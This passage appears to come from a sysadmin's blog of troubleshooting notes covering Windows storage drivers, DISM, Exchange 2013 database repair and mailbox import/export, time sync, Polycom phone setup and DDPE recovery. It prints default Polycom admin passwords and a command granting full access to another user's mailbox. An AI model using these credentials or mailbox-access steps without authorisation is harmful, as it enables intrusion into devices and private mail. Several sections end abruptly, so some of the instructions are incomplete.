-when it restarts it will do a chkdsk.
-let it finish.
-it will reboot.
-voila! You can bootcamp Windows!

For diagnostic information, this is provided.

-boot to osx
-open terminal
-type: diskutil list
-type: sudo gpt -r -vv show disk0
-type: sudo fdisk /dev/disk0

DEFINITIONS
boot manager: manages your booting process. This can actually be changed to REFIND, PLOP, LILO, GRUB2 and a few others. Fun stuff! Not for the faint of heart! (see here for boot loaders https://en.wikipedia.org/wiki/Comparison_of_boot_loaders)
boot loader: load an OS kernel and hand off control of the computer to that kernel.

/--bl-->k-->osx
bm--|--bl-->k-->centos/rhel
\--bl-->k-->win7/8/10

NOTES:

## Intel Rapid Storage Technology (RST) (IRST)

I was going to write a blog post about SATA, AHCI, RAID, RST, IRST, ICH10R, X58 and the drivers needed along with the settings and the difference between the drivers and the software but this post does a better job than I ever would be able to (as well as better explanation than Intel does too):

I will say that the SATA/AHCI/RAID/IRST drivers are driving the southbridge (ICH10R, etc) which is the HOST-CONTROLLER (aka DISK-CONTROLLER aka STORAGE-CONTROLLER) and that the CHIPSET drivers are driving the northbridge (X58, etc).

Also, I will say that the speed of the SATA-I (150MB), SATA-II (300MB) or SATA-III (600MB) depends on both the HARD-DRIVE itself and the HOST-CONTROLLER. The easy ways to find the HOST-CONTROLLER speed is by using CPUID or HWINFO.

Lastly, I'll say that you only need the RST if you are running in AHCI or RAID mode. If not, then you can use the chipset drivers.

Here's how:

• 1 -if you are in IDE mode, change to AHCI mode:
For Windows 7, change the registry. In cmd (as admin), type: echo y | reg add "HKLM\System\CurrentControlSet\Services\Msahci" /v Start /d 0
For Windows 10, set to boot into safe mode with msconfig. You will need your local admin password, no domain or Microsoft accounts can access safe mode.
• 2 -reboot
• 3 -In the bios, the SATA drive should be set to AHCI (not IDE).
Dell systems are automatically set to RST/RAID. I guess so that it is flexible in case someone wants to set up a RAID, they can without too much difficulty. Also, there is a little boost in performance. I have witnessed extremely slow systems due to incorrect RST drivers, even on new systems. The RST drivers need to be updated as this can be a limiting factor. In some cases (Optiplex/Inspiron All in One pc's), Dell is not providing updated RST drivers and you must source them from Intel.
• 4 -reboot.
For Windows 10, set to boot into normal mode with msconfig.
• 5 -reboot.

NOTES:
-https://support.microsoft.com/en-us/help/922976/
-SSD's should be set to RAID/RST as there will be a little boost in performance.
-ICH10R can only go to RST v11.
-as of this writing the RST v15 is the newest.
-you will need a couple of reboots, in case you couldn't tell.

## Quickbooks 2011 on Mac El Capitan

Don't believe QUICKBOOKS support when they tell you that you have to upgrade to the newest version of QUICKBOOKS for MAC. QUICKBOOKS 2011 will work fine.

In the spirit of "just fix it" here's how:

## Windows Package Manager

You're familiar with RPM. Windows has a similar package manager, for Windows packages only.

It should be called WPM for Windows Package Manager but it's called DISM for Deployment Image Servicing and Management.

<tirade>Can they not come up with something all by themselves that works? Must they continuously ripoff open-source projects and change a certain percentage so that they can get around law? Then be so terrible at implementation that it would be graded as a D project?</tirade>

Show all Windows packages:

dism /online /get-packages /Format:Table

Find if a certain package is installed:

dism /online /get-packages |findstr KB2919355

Remove package:

Scan to see if there is corruption:

dism /online /cleanup-image /scanhealth

Report if there is corruption:

dism /online /cleanup-image /checkhealth

Repair if there is corruption:

dism /online /cleanup-image /restorehealth

Restore to a source image:

dism /online /cleanup-image /restorehealth /source:wim:d:\your\source\here\install.wim:1 /limitaccess

Remove old versions of packages:

dism /online /cleanup-image /startcomponentcleanup

Lock in all packages and service packs so that they cannot be uninstalled:

dism /online /cleanup-image /startcomponentcleanup /resetbase

Check to see if you have bad sectors on a disk:

• -use HDTUNE

This will give a graphical representation of any bad sectors on the disk. It will mark it as red.

If you have bad sectors, it isn't the end of the world. We can mark them as bad so that those sectors won't be used any more. If you have 1-9 bad sectors, this isn't a problem. If you have more than 9 then most likely the issue will grow. More bad sectors will show and then the drive will become useless.

Fix bad sectors on a disk:

• -use UBCD > HDD > DIAGNOSTICS > HDAT2
• -type: HDAT2
• -select the disk by using the arrows keys on keyboard.
• -hit ENTER.
• -select VERIFY/WRITE/VERIFY
• -let it run all the way through.

In my experience, if too many bad sectors happen, it's easier to clone the drive and move on with the data loss. At that point, the data might be able to be replaced/repaired.

Cloning can be done with Clonezilla or many other tools. I prefer DDRESCUE as in this article.

Again, there are so many tools in this area like DATA-LIFEGUARD, SEATOOLS, CRYSTALDISKINFO, etc that it's hard to know what to use and what not to bother with. The above reference of:

• HDTUNE
• HDAT2
• DDRESCUE

is a good start. I wish I retained all the info I've learned and used in the past but most of it escapes me now. No doubt that a data expert will have his or her own choice set of tools. I'd love to hear about them!

## Dell Optiplex Wake On Lan Doesn't Work

Dell Optiplex Wake On Lan doesn't work even though the Wake On Lan setting is enabled.

### SOLUTION

This is because the DEEP SLEEP setting is ENABLED in the BIOS.

• -enter BIOS.
• -expand POWER-MANAGEMENT.
• -click DISABLED.
• -click SAVE.

If that doesn't work, make sure the BIOS is the newest version.

## Polycom Phone Set is "Not Registered"

A Polycom Phone Set (Fonality) is saying NOT REGISTERED in the http://cp.fonality.com
(I guess this could be any Polycom Phone Set and Asterisk.)

Basically, the EXTENSION PASSWORD has to be typed into the PHONE SET. Here's how:

• -open CP.FONALITY.COM
• -click USERS/EXTENSION > VIEW USERS (at the top).
• -click the EXTENSION you need to fix.
• -expand the EXTENSION section (at the bottom).
• -find SIP PASSWORD (on the right).
• -click SHOW

This should show you the SIP PASSWORD which will be a random set of letters and numbers.

• -find the IP of the phone set you want to change.
• -login to that phone set via a web browser.
• -USER: Polycom (case-sensitive) (or possibly there is no USER).
• -PASS: 456 (or possibly the Fonality default password of: 9418941962).
• -click LINES (or possibly SIMPLE-SETUP > SIP LINE IDENTIFICATION)
• -USER: should be the MAC of the phone (do not change this if something is already there).
• -type in the password that it showed from the first section.

What threw me for a loop here is that the first time around, the SIP PASSWORD section wasn't showing. If the SIP PASSWORD section doesn't show:

• -click APPLY ALL CHANGES (at the bottom) (yes, without changing anything).
• -afterwards, the section should show.

### UPDATE

If you have to manually do this:

-cd /tftpboot
-change the <mac>.cfg to refer to the newest *.ld file
-ensure that the user is in the /etc/asterisk/sip.conf file. (case-sensitive)
-change the <mac>-reg-basic.cfg to use the username/password that is in the sip.conf file. (case-sensitive)
-change the polycom.UC4.1.8.device-<site>.cfg to TFTP from the local server (rather than FTP to the hq server).

NOTES:
-the <mac>.cfg should just have the rest of the *.cfg files.
-the <mac>-reg-basic.cfg will have the setting for the phone-set to make calls.
-the <mac>-features.cfg will have the features of the phone such as background, volume, etc
-the <mac>-phone.cfg will have the phone overrides. Settings set by changing the settings on the phone set itself.
-the <mac>-web.cfg will have the web overrides. Settings set by changing the settings on the web site itself.
-the polycom.UC4.1.8.device-<site>.cfg will have the FTP/TFTP settings.

You're awesome!

## Redirect HTTP to HTTPS in Exchange 2013

You have an EXCHANGE 2013 server.

This web site works: https://mail.domain.tld

This web site does not work: http://mail.domain.tld

You get an error message:
"HTTP ERROR 403.3 - Forbidden. The page you are trying to access is secured with Secure Sockets Layer (SSL)."
or
"Server Error: 403 - Forbidden: Access is denied."

Here's how to fix:

• -open SERVER-MANAGER
• -click TOOLS > INTERNET INFORMATION SERVICES MANAGER (IIS)
• -expand SERVER > SITES > DEFAULT-WEB-SITE
• -click ERROR PAGES (in the middle).
• -click ADD (on the right).
• -type: 403.4 (in STATUS CODE).
• -bullet RESPOND WITH A 302 REDIRECT
• -type: https://mail.domain.tld
• -click OK.

First of all, this can happen for many reasons. However, in my experience, this happens because the web site is required to have HTTPS and not HTTP. What is amazing here is that this is a perfect example of how different groups of people think differently. Accordingly, the amount of misinformation on this is mind-boggling and complex.

For example, one MS article recommends to turn off SSL:
https://support.microsoft.com/en-us/kb/2839692

Ummm, that's a big NO. Recommending to do so is simply irresponsible.

Others recommend a complex setup for a URL-REWRITE, like this

Ummm, that's also a big NO.

Others recommend to do a HTTP REDIRECT on the OWA section of the web site:
https://www.itsupportguides.com/exchange-2010/exchange-2010-outlook-web-access-error-403-access-is-denied/

Ummm, that's also a big NO. In fact, doing so will kill access to EXCHANGE altogether.

Like usual, the only way I found to handle this was through a comment on a random blog article here:
https://www.sslshopper.com/iis7-redirect-http-to-https.html

## Exchange 2013 EDB File Repair and Restore

Messing around with EXCHANGE 2013 EDB files can be tricky. It's best to have a plan before you start typing in commands. Here's my cheat-sheet.

### REPAIR THE EDB FILE & MOUNT RECOVERY EDB

Again from last time, you can do this with StorageCraft. Paying the license is worth the hassle it saves and more affordable than dealing with MS SUPPORT.

MAKE A COPY OF THE EDB & THE LOG FILES
I don't care how you do it, just do it. If it takes 2 hours to do, then wait the 2 hours for the copy to happen. If you have to run to the store to buy a spare HD, then run to the store. !!!DO NOT BE CARELESS WITH THE EDB FILE!!! Rather, perform your work on a working-copy.

$ cd e:\exchange-repair\working-copy

CHECK TO SEE THE STATE
$ eseutil /mh '.\Mailbox Database FOO.edb'

SOFT RECOVERY
$ eseutil /r E00 /l E:\exchange-repair\working-copy /d E:\exchange-repair\working-copy

CHECK TO SEE THE STATE
$ eseutil /mh '.\Mailbox Database FOO.edb'

HARD RECOVERY (IF NECESSARY)
$ eseutil /p '.\Mailbox Database FOO.edb'
(!!!CAUTION!!!: performing this will render the database with data loss.)

CONNECT THE RECOVERY DATABASE
$ New-MailboxDatabase -Server exchange-server-name -Name RecoveryDB -Recovery -EdbFilePath 'E:\exchange-repair\working-copy\Mailbox Database FOO.edb' -LogFolderPath 'E:\exchange-repair\working-copy\recoverylogs'

DISMOUNT THE CURRENT RECOVERY DATABASE
$ dismount-database RDB
(There can only be 1 recovery database mounted at any one time. There can be more than 1 recovery database connected. See the difference between CONNECTED & MOUNTED?)

MOUNT THE RECOVERY DATABASE
$ Mount-Database RecoveryDB

### CHECK THE STATS OF THE RECOVERY DATABASE

CHECK THE STATS OF THE ENTIRE RECOVERY DATABASE
$ Get-MailboxStatistics -Database RecoveryDB | ft -auto

CHECK THE STATS OF THE CURRENT USER-MAILBOX
$ Get-MailboxStatistics foo.user

CHECK THE STATS OF THE RECOVERY USER-MAILBOX
$ Get-MailboxStatistics -Database RecoveryDB | where mailboxguid -eq 24b5b78e-9396-456f-9ece-a5acaeb3e3e7

### RESTORE MAILBOX FROM A RECOVERY DATABASE

The RESTORE requires DisplayName, MailboxGUID, or LegacyExchangeDN. The most exact is the MAILBOXGUID since the DisplayName can be lengthy with spaces.

GET THE MailboxGUID:
$ Get-MailboxStatistics -Database RecoveryDB | ?{$_.DisplayName -like 'FirstNameHere*'} | fl DisplayName,MailboxGuid,DisconnectDate

It will spit out the mailbox accounts that match along with the GUIDs.

RESTORE THE RECOVERY USER-MAILBOX
$ New-MailboxRestoreRequest -SourceDatabase RecoveryDB -SourceStoreMailbox 28282f8e-e37b-4965-9dea-4e8658fada43 -TargetMailbox foo.user -AllowLegacyDNMismatch

-see the status of all the requests:
$ Get-MailboxRestoreRequest

-see detail status of individual request:
$ Get-MailboxRestoreRequestStatistics -Identity "foo.user\MailboxRestore"

-see the detail status of all the requests:
$ Get-MailboxRestoreRequest | Get-MailboxRestoreRequestStatistics

-the request hangs around until you stop it. They are not automatically cleared. Only run this when the request is complete.
$ Remove-MailboxRestoreRequest -Identity "foo.user\MailboxRestore"

-or remove all the completed requests:
$ Get-MailboxRestoreRequest -Status Completed | Remove-MailboxRestoreRequest

### IMPORT A PST INTO THE EDB

Sometimes a user has the pst from their laptop and you can import that pst back into the edb. Don't worry, by default it doesn't duplicate items.

First, enable the import/export of .pst into a mailbox as it is not turned on by default:
$ New-ManagementRoleAssignment -Role "Mailbox Import Export" -SecurityGroup "Organization Management"
-restart EMS (this means shut down your powershell and open it back up ;-))

-import a PST file into a user's primary mailbox
(NOTE: By default, the import checks for duplication of items and doesn't copy the data from the .pst file into the mailbox or archive if a matching item exists in the target mailbox or target archive.)
-you have to use the new-mailboximportrequest command. It requires UNC path (eg: \\exchange-server\foo-folder$). It will not work with an absolute path (C:\foo-folder\recovered.pst). Definitely an oversight.
-create an easy folder (i.e.: c:\foo-folder\)
-share the folder as a hidden share by putting a dollar-sign ($) behind the name (foo-folder$).
-grant full-access to 'exchange trusted subsystem' (NTFS and Share permissions)
-import the pst:
$ New-MailboxImportRequest -FilePath \\exchange-server\foo-folder$\Recovered.pst -Mailbox foo.user

-see the status of the import request:
$ get-mailboximportrequest

-see the details of the import request:
$ Get-MailboxImportRequestStatistics -Identity foo.user\mailboximport

-the request hangs around until you stop it. They are not automatically cleared. Only run this when the request is complete.
$ Remove-MailboxImportRequest -Identity "foo.user\MailboxImport"

-or remove all the completed requests:
$ Get-MailboxImportRequest -Status Completed | Remove-MailboxImportRequest

### SEE MOVE REQUESTS

Hopefully, the syntax is becoming clearer. Let's see if you know what this is...
$ Get-MoveRequest
$ Get-MoveRequest | Get-MoveRequestStatistics
$ Get-MoveRequest -MoveStatus Completed | Remove-MoveRequest

### EXPORT PST FROM EDB

If for some reason you need to export a pst from the edb, you can do that too. Again, it can only be done to a UNC (eg: \\exchange-server\foo-folder$). It cannot be done to an absolute path (C:\foo-folder\recovered.pst). Definitely an oversight.

$ New-MailboxExportRequest -Mailbox foo.user -FilePath "\\exchange-server\recovery$\foo.user.recovered.pst"
$ Get-MailboxExportRequest
$ Get-MailboxExportRequest | Get-MailboxExportRequestStatistics
$ Get-MailboxExportRequest -Status Completed | Remove-MailboxExportRequest

### MAILBOX REPLICATION SERVICE (MRS)

Throttling is done by the MRS. It is configured here:
C:\Program Files\Microsoft\Exchange Server\V15\Bin\MsExchangeMailboxReplication.exe.config

Do not try to mass import/export/move, unless you know what you are doing. The default settings for the MRS will most definitely bite you. The processes will error out and eventually die after 12 hours. I wouldn't do more than 20 at a time.

There's too many switches. Basically, the more you do at a time, the more resources it takes. The more resources it takes, the longer it takes. If you hit 12 hours, the request stalls.

Yes, you can configure all of these settings if you really want to. This is the best resource for more info:
http://thoughtsofanidlemind.com/2014/09/29/exchange-2013-workload-management-controls-mailbox-replication-service/

### NOTES

• Transferring from EDB into an empty mailbox is preferred. In my experience, it is much better. In my experience, mailbox to mailbox misses items and pst to mailbox misses items too.
• If you can, import into a dummy mailbox account so that you can test and approve the contents before you import it into the real mailbox.

## Network Node Central Management

What can I say?

• PDQ
• Lansweeper
• LogicNow
• Matrix42

## Exchange 2013 Failed to Mount Database

### MY EXPERIENCE

Ughhh....

Users report that they can't access their email. Message is, "Microsoft.Exchange.Data.Storage.MailboxOfflineException"

Ok, so the Mailbox is offline. Why is it offline?

The database for the Exchange 2013 is broken into 3 different groups.

• A-H
• I-P
• Q-Z

Databases I-P & Q-Z are working fine but database A-H won't mount. Why won't it mount?

It won't mount because it is corrupt. How did it get like this?

It got like this because EXCHANGE 2013 uses EDB files. It is a single file that stores everything. This file grows. Sooner or later it craps out. I'm not sure why but my guess is on NTFS.

If I check the EVENT LOG > APPLICATION, I see,
"Active Manager failed to mount the database Mailbox A-H. Error: An Active Manager operation failed. Error: The database action failed. Error: Operation failed with message: MapiExceptionDatabaseError: Unable to mount database. (hr=0x80004005, ec=1108)"

It gets worse, I'm also getting:
"Microsoft Exchange Information Store worker process (18152) has encountered an unexpected database error (Disk IO error) for database Mailbox A-H with a call stack of..."

And still worse:
"Database copy Mailbox A-H on this server appears to have a serious I/O error."
"Service recovery was attempted by failover to another copy. Failover was unsuccessful in restoring the service. Error: There is only one copy of this mailbox database. Automatic recovery is not available."

And worse:
"Information Store - Mailbox A-H ; Database recovery/restore failed with unexpected error - 1022"

And worse:
"Information store - Mailbox A-H: An attempt to write to the file "C:\Program Files\Microsoft\Exchange\V15\Mailbox\Mailbox Database 1889704935\Mailbox Database 1889704935.edb" at offset... bytes failed after 0.000 seconds with system error 665. The requested operation could not be completed due to a file system limitation. The write operation will fail with error - 1022. If this error persists then the file may be damaged and may need to be restored from a previous backup."

All of this to say that the database is corrupt.

We got 2 options:

1. restore from backup.
2. repair database.

To repair:

• cd \
• cd \Program Files\Microsoft\Exchange Server\V15\Mailbox\Mailbox Database Foo\
• eseutil /mh ".\database-name.edb"
• eseutil /p ".\database-name.edb" /g

Then I moved all the log files away from Exchange log folder.

First create a backup-directory, then move all the files into the backup-directory:

• mkdir bkp
• move * bkp

Then move the database-file.edb back where it came from:

• cd bkp
• move database-name.edb ..\

Now defrag the database-file.edb:

• eseutil /d database-file.edb

Now check to see if the database-file.edb is OK:

• eseutil /mh ".\database-name.edb"

Finally, mount the database:

• $ Mount-Database "database-name"

NOTE: you can run eseutil.exe /mh without effect. It is informational only.

In the end, it was easier to create a new database-name.edb and import the items needed via edbmails. Don't ask me why it took more than 24 hours to get to a solution that should have been the first option. This is exactly why I keep a note of items here.

### MS SUPPORT

Luckily, I called MS support. So you get the short of the conversation without having to pay ;-)

-too many log files.

-database file is too large. It is 539GB.

-ran eseutil /mh ".\database-name.edb"

-stop MS Exchange Information Store

-uninstall Veeam Backup

-get-mailboxdatabase

-get-mailboxdatabasecopystatus *

-wait for the databases to mount.

-shows "Dismounted"

-event-viewer > application and they see the same errors I already found.

-uninstall some programs that might be accessing the file.

-ran eseutil /mh ".\database-name.edb"

-error 1032. This means it's being used somewhere.

-storagecraft was trying to mount it.

-stop storagecraft service

-ran eseutil /mh ".\database-name.edb"

-success

-see that the log-required is lengthy

-sequence is from E000015CD80 to E000015CDCF

-created new folder & moved the sequence into this new folder

-ran eseutil /ml ".\database-folder\new folder\E00"

-"no damaged log files were found"

-ran eseutil /r E00 /d ".\database-name\new folder" /l "new-folder" /S "new-folder" /a

-ran eseutil /r E00 /d ".\database-name\new folder" /l "new-folder" /S "new-folder" /i

-ran eseutil /mh ".\database-name.edb"
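
The `eseutil /mh` state check from the cheat-sheet and the "log required" sequence noted above can be combined into one check before choosing between `/r` and `/p`. This PowerShell is an added example, not from the original post: the function name `Get-EdbRecoveryPlan`, the sample header text and the temp-folder files are constructed, and English-language `eseutil` output is assumed.

```powershell
# Added example (not from the original post). The header text and the temp
# folder contents in the demo are constructed; E00 is the post's log prefix.

function Get-EdbRecoveryPlan {
    [CmdletBinding()]
    param(
        [string[]] $HeaderLines = @(),                 # output of: eseutil /mh <edb>
        [Parameter(Mandatory)] [string] $LogFolder,    # folder holding the copied logs
        [string] $LogPrefix = 'E00'                    # same prefix passed to eseutil /r
    )

    $state = $null
    $firstGen = 0
    $lastGen = 0
    foreach ($line in $HeaderLines) {
        if ($line -match '^\s*State:\s*(.+?)\s*$') {
            $state = $Matches[1]
        }
        elseif ($line -match '^\s*Log Required:\s*\d+-\d+\s*\(0x([0-9a-f]+)-0x([0-9a-f]+)\)') {
            $firstGen = [Convert]::ToInt64($Matches[1], 16)
            $lastGen  = [Convert]::ToInt64($Matches[2], 16)
        }
    }
    if (-not $state) { throw 'No "State:" line found; is this eseutil /mh output?' }

    # Generation N lives in <prefix><N as 8 hex digits>.log, e.g. E000015CD80.log.
    $required = @()
    if ($lastGen -gt 0) {
        $required = @(for ($gen = $firstGen; $gen -le $lastGen; $gen++) {
            '{0}{1:X8}.log' -f $LogPrefix, $gen
        })
    }
    $missing = @($required | Where-Object {
        -not (Test-Path -LiteralPath (Join-Path $LogFolder $_))
    })

    # The highest generation may still sit in <prefix>.log (not yet renamed), so
    # do not count it as missing when that file exists; confirm with eseutil /ml.
    $currentLog = Join-Path $LogFolder "$LogPrefix.log"
    $checkCurrent = $false
    if ($missing.Count -gt 0 -and $missing[-1] -eq $required[-1] -and
        (Test-Path -LiteralPath $currentLog)) {
        $checkCurrent = $true
        $missing = @($missing | Where-Object { $_ -ne $required[-1] })
    }

    if ($state -like 'Clean Shutdown*') {
        $next = 'Clean: connect and mount the copy as a recovery database.'
    }
    elseif ($state -like 'Dirty Shutdown*' -and $missing.Count -eq 0) {
        $next = "Soft recovery: eseutil /r $LogPrefix /l <log folder> /d <edb folder>"
    }
    elseif ($state -like 'Dirty Shutdown*') {
        $next = 'Required logs are missing: locate them before falling back to eseutil /p (data loss).'
    }
    else {
        $next = "Unrecognised state '$state': stop and inspect the header by hand."
    }

    [pscustomobject]@{
        State            = $state
        RequiredLogs     = $required.Count
        MissingLogs      = $missing
        VerifyCurrentLog = $checkCurrent
        NextStep         = $next
    }
}

# --- Demo on constructed data ---------------------------------------------
$sampleHeader = @(
    '            State: Dirty Shutdown',
    '',
    '     Log Required: 1428864-1428943 (0x15cd80-0x15cdcf)',
    '    Log Committed: 0-1428944 (0x0-0x15cdd0)'
)
$demoLogs = Join-Path ([IO.Path]::GetTempPath()) ('edb-demo-' + [guid]::NewGuid().ToString('N'))
New-Item -ItemType Directory -Path $demoLogs | Out-Null

# Create every required log except two, to simulate a gap in the sequence.
for ($g = 0x15CD80; $g -le 0x15CDCF; $g++) {
    if ($g -ne 0x15CD9A -and $g -ne 0x15CD9B) {
        New-Item -ItemType File -Path (Join-Path $demoLogs ('E00{0:X8}.log' -f $g)) | Out-Null
    }
}

Get-EdbRecoveryPlan -HeaderLines $sampleHeader -LogFolder $demoLogs | Format-List
Remove-Item -LiteralPath $demoLogs -Recurse -Force
```

On a server, feed it the real header instead of the sample: `Get-EdbRecoveryPlan -HeaderLines (eseutil /mh '.\Mailbox Database FOO.edb') -LogFolder 'E:\exchange-repair\working-copy'`.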

### NEW PLAN

-copy the database-name.edb

-start a new database-name.edb (this will get everyone receiving email)

-repair the database-name.edb

-merge the file back into the new-database-name.edb

INFO GATHER

-repair is 5-6GB per hour

-ran eseutil /p ".\old-database-name.edb"

-merge into new-database-name.edb

[PS] c:\users\admin> cd "C:\Program Files\Microsoft\Exchange Server\V14\Bin"

[PS] C:\Program Files\Microsoft\Exchange Server\V14\Bin>eseutil /r E00 /i /l 'Y:\ExchangeRestore\Mailbox Database' / 'Y:\ExchangeRestore\Mailbox Database'

FINDINGS

StorageCraft to the rescue again with Granular Recovery for Exchange.

Testing it out now...

OK, I'm back. The StorageCraft GRE is a good tool. It does what eseutil should do but makes it easy for the stressed out administrator. It also has the added benefit of having granular restore. You can restore just one email.

If you have the budget, I recommend it. It's way better than EDBMAILS and other software I've tried.

## Setting Windows Time - w32tm

Here's how this goes. There should only be one NTP SERVER on the network. You can have more but it would be redundant.

### SERVER / NON-DOMAIN COMPUTERS

The domain-server should be set to sync with an external source.

• $ w32tm /config /syncfromflags:manual /manualpeerlist:"0.pool.ntp.org 1.pool.ntp.org 2.pool.ntp.org 3.pool.ntp.org" /reliable:yes /update
• $ stop-service w32time
• $ sc.exe stop w32time
• $ start-service w32time
• $ sc.exe start w32time

### DOMAIN COMPUTERS

The domain-clients should automatically get their time from the server. If for some reason, a domain-client doesn't, then force it:

• -open POWERSHELL (as admin)
• $ w32tm /config /syncfromflags:domhier /update
• $ stop-service w32time
• $ sc.exe stop w32time
• $ start-service w32time
• $ sc.exe start w32time

### HYPER-V MANAGER

If it is a VIRTUAL-OS, disable TIME-SYNCHRONIZATION from the HYPER-V settings:

• -open HYPER-V MANAGER
• -click on the VM
• -click SETTINGS (on the right-hand side)
• -scroll down to INTEGRATION SERVICES
• -uncheck TIME-SYNCHRONIZATION
• -click OK

You can check to see if a NTP Server is working.

### If it's a VIRTUAL-HOST,

• -check to see if an external NTP server is working.
• -if you get an error, check to see if an internal NTP server is working.
• -set the server to a working NTP server
• External: $ w32tm /config /syncfromflags:manual /manualpeerlist:"0.pool.ntp.org 1.pool.ntp.org 2.pool.ntp.org 3.pool.ntp.org" /reliable:yes /update
• Internal: $ w32tm /config /syncfromflags:manual /manualpeerlist:192.168.1.1 /reliable:yes /update

### You can check the config:

• $ w32tm /query /configuration
• $ w32tm /query /status
• $ w32tm /query /source
• External-check: $ w32tm /monitor /computers:pool.ntp.org
• Internal-check: $ w32tm /monitor /computers:192.168.1.1

Some recommend (I have not tried this):

• -force the VIRTUAL-HOST to use an external source via regedits
• (HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\W32TIME\TIMEPROVIDERS\NTPSERVER\ENABLED: 1)
• -set the external: $ w32tm /config /syncfromflags:manual /manualpeerlist:"0.pool.ntp.org 1.pool.ntp.org 2.pool.ntp.org 3.pool.ntp.org" /reliable:yes /update
• $ stop-service w32time
• $ start-service w32time
• -then set the VIRTUAL-OS to use the internal VIRTUAL-HOST: $ w32tm /config /syncfromflags:manual /manualpeerlist:192.168.1.1 /reliable:yes /update
• (rather than through INTEGRATION SERVICES)
• $ stop-service w32time

### GFI Max

$12 per computer annually & $150 per server annually.

### Continuum

$15 per computer annually & $175 per server annually or little higher than GFI Max is all I found. But they have an interesting white label tech support with 24 hour availability.

### LabTech

Can't find much but I know it's similar to those above. Price per node per month.

## Windows Profile Always Loads Default Profile (Or Temporary Profile)

Windows Profile Always Loads Default Profile (Or Temporary Profile).

How to fix:

• -click START > RUN > REGEDIT
• -browse to: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\
• -find profile that isn't working.
• -you might find duplicate profile in this area. The new one is being loaded with nothing in it. The old one may have .bak at the end.
• -add .old to end of incorrect profile.
• -remove .bak from end of correct profile.
• -go to the profile not working (only if needed).
• -change refcount from 1 to 0 (only if needed).
• -change state value from 33024 to 0 (only if needed).
• -restart and login to the user account.

That's it!!! You're hired!

## NiNite et al

A list of tools that I want to use and some I never knew of:

• -vi
• -putty
• -solarwinds stuff
• -ninite
• -powershell/cmd
• -hirens
• -ubcd
• -knoppix
• -MRAT
• -mremoteng
• -nagios/prtg/zabbix
• -devolutions-remotedesktopmanager
• -leatherman
• -wire-tester/toner-probe
• -lansweeper

### product

• veeam
• sonicwall/watchguard
• virus/spyware/malware
• printer setup/service
• server management
• desktop management
• esxi free, hyperv, xenserver
• wireless setup
• lan/wan design & implementation
• remote support
• break/fix
• contract support/managed-service-provider

## 727-777-5827 is a Scam

727-777-5827 is a scam. Here's the short version:

• -got a phone call from 727-777-5827.
• -automatic message.
• -press 1 to speak to local representative.
• -"Hi, who is this?" I asked.
• -"Gene."
• -"Who are you with?"
• -"SEO INC."
• -"Where are you located?" I asked.
• -"Southern California."
• -"That's not very local." I stated.
• -They hung up.

## Firewalls

I have experience with many firewalls.

• -SonicWall
• -WatchGuard (FireBox).
• -DDWRT/BusyBox.
• -PFSENSE.
• -Untangle.
• -anything Linux/Unix with IPTABLES.

What's funny is that one time a CFO started asking me questions about the firewall because they allowed a KEY-LOGGER onto one of their accounting systems and because of their poor choice in banks it logged the USERNAME and PASSWORD to the web site that allows them to do WIRE TRANSFERS.

Funny.

Still at some level, a point can be derived that not all firewalls are the same. The general idea is that you want to block/allow access to certain items at a network level rather than at a desktop level. You are trying to block incoming items at that network level.

To the network administrator, this can be seen as blocking/allowing the ports needed and directing them where they need to go.

To a client, this is blocking everything bad in the universe from getting on the local machine. So if the person in accounting is playing games, clicks on a link in a spam email and downloads something harmful, this is a result of the firewall not being strong enough and not a result of the person in accounting.

Nor is it the fact that they were trying to save money by going with a less than average bank who ALLOWS WIRE TRANSFERS BY A SIMPLE USERNAME AND PASSWORD!!! ARE YOU OUT OF YOUR MIND!!!

Still firewalls can be used to keep people from harming themselves by blocking some types of files. From this point, you'll have to manage the fine balance of allowing items through to make work flow and block evil stuff all at the same time.

Here is the Polycom Phone Set Password:

PHONE SETS:
USER: Polycom
PASS: 9418941962

You can apply this to the other Polycom articles in this blog.

Again, what's interesting is that some of the settings have to be set via the phone set itself and some of the settings have to be set via the server.

In this particular case, I wanted to display the EXTENSION instead of the NAME. This is set via the phone config rather than via the server config.

## View User's MailBox in Exchange 2013

Let's say you want to view a user's mailbox in Exchange 2013. Here's the trick:

This will get you into their mailbox. If you don't have permission, it will say, "You don't have permission to open this mailbox."

To fix this, you'll have to go into the powershell and type:

• Add-MailboxPermission foo.user -user foo.user2 -AccessRights FullAccess

You can view but you can't send mail as them. You have to go one step further:

## DDPE Recovery

So let's say you have DDPE encrypting the full drive. The drive won't boot. Now you can't access your computer, and the files you can access are encrypted so you can't read them. What do you do?

Well if you have the encryption keys, you'll be able to retrieve the documents with a set of tools from Dell called the DDPE Administrative Utilities.

• -build a WINDOWS PE disk from a working computer (how to do this is outside the scope of this document).
• -copy over the DELL WINDOWS RECOVERY KIT (really what we need are the unzipped OFFLINE TOOLS, more specifically the cmgau.exe. See below.)
• -copy over the encryption keys (It'll say something like LSARecovery_machine-name-here.exe).
• -boot from the USB
• -exit out of OPAL SED
• -at the command prompt go to e:\dell-offline-admin-32bit-version-number-here\
• -type: cmgau.exe -o
• -type in the directories you want decrypted.
• -point to the LSARecovery_machine-name-here.exe
• -type in the PASSWORD for the LSARecovery_machine-name-here.exe

The process will decrypt the DDPE directories that you specified. You will have to wait for it to decrypt and then transfer those documents over to a working drive.

## OpenVPN and Mac Client

I'm in a situation where I need to use OPENVPN on a Mac. This requires an OPENVPN MAC CLIENT.

So my natural question progression is this...

Q: Can I use the built-in VPN client on the MAC?
A: Because OPENVPN uses a different mechanism than what's built into MAC OS X, a software package is required. This mechanism is called a kernel extension or kext. The kext that is needed is either TUN or TAP. Since you need a kext, you need to install a software package.

Q: What software package is needed then?
A: There are a few options:

Q: What is recommended?
A: It seems everyone tends to use Tunnelblick.

## Personal Email Certificates for Outlook - Digital Signature

A PERSONAL EMAIL CERTIFICATE is a certificate that verifies that the email is from the original author and that the email message isn't altered. This is like a seal on a real message. That seal might be a wax spot with a unique marking. The seal doesn't prevent someone from reading the message (this is the job of encryption). All someone has to do is open the message. What the seal does is ensure that the message is verified as coming from the author and that the message hasn't been altered.

There are several places to get PERSONAL EMAIL CERTIFICATES. MOZILLA helped in identifying some of those places here:
http://kb.mozillazine.org/Getting_an_SMIME_certificate

After about a minute of searching, I figured the best route to go was with COMODO as it's free. I can afford free.

### Export the Personal Email Certificate

The issue here is that we need it installed on the OS SYSTEM (not in the BROWSER).

• -click FIREFOX > PREFERENCES > ADVANCED (on the left-hand side) > CERTIFICATES (at the top).
• -click VIEW CERTIFICATES (at the bottom).
